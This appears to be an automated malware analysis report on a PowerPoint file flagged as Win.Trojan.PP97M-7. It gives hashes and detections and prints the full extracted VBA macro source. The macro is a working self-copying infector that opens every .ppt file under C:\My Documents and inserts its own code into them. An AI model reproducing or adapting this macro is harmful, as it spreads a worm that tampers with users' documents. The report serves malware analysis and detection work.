Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3bc3caec7361d477…

MALICIOUS

Office (OLE)

26.0 KB Created: 1998-12-09 10:33:06 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 69fed3ee0db9b616e6514d7022b92966 SHA-1: d7a2248b14ca15db2c27e855e411c7bda538c08b SHA-256: 3bc3caec7361d4776746fecb0227f2625ce6914692b4847af32e6c182087e110
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a PowerPoint file containing VBA macros. The macro code attempts to copy itself to other .ppt files found in the 'C:\My Documents' directory. This behavior suggests a self-propagation or worm-like functionality within the PowerPoint ecosystem. The ClamAV detection of 'Win.Trojan.PP97M-7' further supports its malicious nature.

Heuristics 2

  • ClamAV: Win.Trojan.PP97M-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-7
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1768 bytes
SHA-256: d8672b3dc6367bf7fa186bb235af77926552158924876be62b70da8016f80a63
Detection
ClamAV: Win.Trojan.PP97M-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9FF9504E-8FB3-11D2-98E1-82B548C9866A}{9FF95040-8FB3-11D2-98E1-82B548C9866A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'<!--1nternal-->
'PPT.Attach v0.1 /1nternal
Private Sub UserForm_Terminate()
    On Error Resume Next
    Set Home = ActivePresentation
    Set fs = Application.FileSearch
    fs.NewSearch
    fs.LookIn = "C:\My Documents"
    fs.SearchSubFolders = True
    fs.FileName = "*.ppt"
    fs.Execute
    For i = 1 To fs.FoundFiles.Count
        If InStr(1, fs.FoundFiles(i), "~", 1) = 0 And fs.FoundFiles(i) <> Home.FullName Then
            Set PVict = Presentations.Open(fs.FoundFiles(i))
            For j = 1 To PVict.VBProject.VBcomponents.Count
                If PVict.VBProject.VBcomponents(j).Type = 3 Then
                    If PVict.VBProject.VBcomponents(j).Codemodule.Lines(1, 1) <> "'<!--1nternal-->" Then
                        PVict.VBProject.VBcomponents(j).Codemodule.InsertLines 1, Home.VBProject.VBcomponents(Name).Codemodule.Lines(1, 27)
                        PVict.Save
                    End If
                End If
            Next
            PVict.Close
        End If
    Next
    Set PVict = Nothing
End Sub

Attribute VB_Name = "Slide1"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
    UserForm1.Show
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.